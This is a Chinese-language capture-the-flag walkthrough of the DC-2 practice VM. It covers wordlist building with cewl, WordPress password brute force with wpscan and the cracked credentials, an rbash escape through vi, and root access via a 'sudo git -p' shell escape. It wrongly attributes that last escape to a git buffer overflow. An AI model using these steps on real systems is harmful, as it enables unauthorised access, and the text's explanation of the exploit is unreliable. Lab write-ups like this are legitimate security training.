本次靶机教程很多细节不好展示
可以去本人bilibili给观看视频教程
本人bilibili主页地址:
https://space.bilibili.com/123895286
靶机下载地址
链接:https://pan.baidu.com/s/1eOdWynbx9crErzY4eeuW5Q
提取码:6b9g
--来自百度网盘超级会员V4的分享
安装与网络配置请看上一章
直接开始!
首先,我们要找到靶机ip,然后进行端口扫描
然后我们访问靶机ip,发现网址跳转,网址为dc-2
显然,计算机无法进行解析
所以,我们需要修改/etc/hosts
我们打开IP,访问正常并得到flag1
flag1,cewl暗示我们需要进行用户账号密码的爆破处理,而cewl是一个网页关键字抓取工具(抓取网页上的关键字,作为密码字典)于是我们对密码进行生成
cewl http://dc-2 > pass.txt
即可获得pass.txt
-w = > //写入
-m n//至少生成长度为n,默认n=3
-d x // 生成更大的字典,默认x=2
由于网站程序的特殊性,我们使用专门利用wordpress的工具 wpscan
wpscan基本使用如下
wpscan –url http://dc-2 -e u
-e u //枚举用户信息
wpscan –url +
-P passwdspath
-U userspath
我们获得三个用户名
下来,我们进行爆破
于是我们得到了Tom与jerry的user和password
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient我们分别进行尝试,发现jerry的账户可以进入
我们稍微寻找,得到了flag2
flag2说你不能利用wordpress程序,那么,我们不禁想到除了可以访问wordpress的80端口,还有ssh服务的7744端口
那么,我们使用ssh -p prot user@ip开始ssh连接
连接后,我们发现flag3.txt
当我们使用cat进行查看时,发现rbash
所以,我们需要查看我们可用命令
tom@DC-2:~$ ls /home/tom/usr/bin
less ls scp vi
于是我们决定利用vi进行rbash逃逸
可以进入vi中执行set命令将shell改为/bin/sh
命令如下:
vi
:set shell=/bin/sh //给shell赋值
:shell //执行shell
逃逸成功后发现命令还是无法执行
我们查看PATH变量
显然,这是路径的问题,我们需要修改路径
export PATH=PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:sbin
然后就可以进行操作了
flag3提示我们使用su命令切换到jerry
那么我们进行切换
我们进入Jerry的家目录看到flag4
flag4提示我们使用git提权,拿下最终的flag
我们可以稍微了解下git
sudo -l //授权查看
Git //开源分布控制系统
原理是git存在缓冲区溢出漏洞,在使用sudo git -p时,不需要输入root密码即可以root权限执行这条命令。
操作如下:
sudo git -p
:!/bin/sh //shell转义,所以要避免sudo授权用户使用vi,vim,ftp.lee,more,git….
cd /root
拿到最终finl-flag!!
